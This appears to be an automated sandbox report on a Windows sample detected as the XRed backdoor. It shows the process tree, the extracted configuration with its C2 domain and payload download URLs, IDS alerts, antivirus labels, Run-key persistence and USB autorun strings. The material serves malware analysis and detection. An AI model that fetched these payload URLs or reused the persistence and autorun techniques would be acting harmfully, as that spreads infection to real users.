Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1583477
MD5: e819c37952e89ff0f473fa9b59cd771d
SHA1: de2a344ed3a2b1f4e0fbd4e684170db56903763e
SHA256: 05f954e37982086a48a222726b8134fbef0caa78dbe1b66a3d4479b712d12012
Tags: exe, user-jstrosch
Infos:

Detection

XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E819C37952E89FF0F473FA9B59CD771D)
    • ._cache_file.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: 630D75210B325A280C3352F879297ED5)
      • Setup.exe (PID: 7724 cmdline: c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe MD5: 006F8A615020A4A17F5E63801485DF46)
        • wordpad.exe (PID: 4712 cmdline: "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p MD5: 61173FF6ABB1C40E3D3B580126FC5F66)
          • splwow64.exe (PID: 2876 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
        • wordpad.exe (PID: 3560 cmdline: "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p MD5: 61173FF6ABB1C40E3D3B580126FC5F66)
    • Synaptics.exe (PID: 7712 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
      • WerFault.exe (PID: 8540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7764 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • Synaptics.exe (PID: 5724 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
file.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProgramData\Synaptics\RCX3CE.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCX3CE.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\Documents\AFWAAFRXKO\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\AFWAAFRXKO\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
Process Memory Space: file.exe PID: 7568 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
Process Memory Space: Synaptics.exe PID: 7712 | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
0.0.file.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0.0.file.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

                              System Summary

                              Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7568, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7712, TargetFilename: C:\Users\user\AppData\Local\Temp\ofbduaaa.xlsm
                              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                              2025-01-02T20:29:37.136706+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49788 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:37.224164+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49789 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:38.412011+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49802 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:38.423454+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49804 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:39.478865+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49814 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:39.492141+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49813 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:40.531218+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49825 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:40.532057+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49824 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:41.980642+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49844 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:42.044430+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49842 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:43.063109+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49855 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:43.113496+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49856 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:44.264089+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49865 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:44.267953+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49868 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:45.869946+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49890 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:45.891107+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49891 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:47.000058+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49902 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:47.054328+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49901 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:48.053490+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49910 | 172.217.18.14 | 443 | TCP
                              2025-01-02T20:29:48.136029+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49912 | 172.217.18.14 | 443 | TCP

                              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                              2025-01-02T20:29:37.480368+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49797 | 69.42.215.252 | 80 | TCP

                              AV Detection

                              Source: file.exeAvira: detected
                              Source: http://xred.site50.net/syn/SUpdate.iniZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SUpdate.iniH)kAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/Synaptics.rarZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlpAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dll6Avira URL Cloud: Label: malware
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: file.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpReversingLabs: Detection: 93%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1ReversingLabs: Detection: 93%
                              Source: file.exeReversingLabs: Detection: 92%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.4% probability
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: file.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010045EB GetFileAttributesA,LoadLibraryA,GetProcAddress,DecryptFileA,GetLastError,2_2_010045EB
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C9017D1 __EH_prolog3,GetLastError,CertCloseStore,CryptMsgClose,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,4_2_6C9017D1
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E8083 CryptQueryObject,4_2_6C8E8083
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E8094 CryptMsgGetAndVerifySigner,4_2_6C8E8094
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E80A5 CryptHashPublicKeyInfo,SetLastError,4_2_6C8E80A5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E80D5 CryptMsgGetParam,SetLastError,4_2_6C8E80D5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E8114 CryptDecodeObject,SetLastError,4_2_6C8E8114
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeWindow detected: MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIESThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any MicrosoftupdatessupplementsInternet-based services and support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1.INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2.Scope of License. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may notdisclose the results of any benchmark tests of the software to any third party without Microsofts prior written approval;work around any technical limitations in the software;reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;publish the software for others to copy;rent lease or lend the software;transfer the software or this agreement to any third party; oruse the software for commercial software hosting services.3.BACKUP COPY. You may make one backup copy of the software. 
You may use it only to reinstall the software.4.DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5.Export Restrictions. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on desusertions end users and end use. For additional information see www.microsoft.com/exporting <http://www.microsoft.com/exporting>.6.SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7.Entire Agreement. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8.Applicable Law.a.United States. If you acquired the software in the United States Washington state law governs the interpretation of this agreement and applies to claims for breach of it regardless of conflict
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1033\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1041\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1042\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1028\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\2052\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1040\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1036\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1031\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\3082\eula.rtf
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1049\eula.rtf
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49842 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49865 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49868 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49891 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49900 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49903 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49901 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49924 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49927 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49961 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49985 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49988 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50007 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50012 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50022 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50034 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50033 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50044 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50046 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50063 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50064 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50075 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50076 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50074 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50083 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50086 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50115 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50116 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50123 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50126 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50133 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50134 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50143 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50144 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50145 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50147 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50149 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50155 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50165 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50166 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50170 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50171 version: TLS 1.2
                              Source: Binary string: sfxcab.pdb source: file.exe, ._cache_file.exe.0.dr, Synaptics.exe.0.dr
                              Source: Binary string: sqmapi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, sqmapi.dll.2.dr
                              Source: Binary string: SetupEngine.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, SetupEngine.dll.2.dr
                              Source: Binary string: patchhooks.pdb source: vc_red.msi.2.dr
                              Source: Binary string: Setup.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2623419946.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe, 00000004.00000000.1389333890.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe.2.dr
                              Source: Binary string: SetupUi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, SetupUi.dll.2.dr
                              Source: Binary string: SetupResources.pdb source: SetupResources.dll4.2.dr, SetupResources.dll3.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll8.2.dr
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: file.exeBinary or memory string: [autorun]
                              Source: file.exeBinary or memory string: autorun.inf
                              Source: RCX3CE.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX3CE.tmp.0.drBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_file.exe Code function: 2_2_010046B9 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strchr,strrchr,SendDlgItemMessageA,2_2_010046B9
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C5E8097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C5E8097
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C5D4281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C5D4281
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C8D5B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C8D5B82
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4_2_6C8D410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C8D410A
                              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe Code function: 4x nop then mov edx, dword ptr [esp+08h] 4_2_6C5EDE44
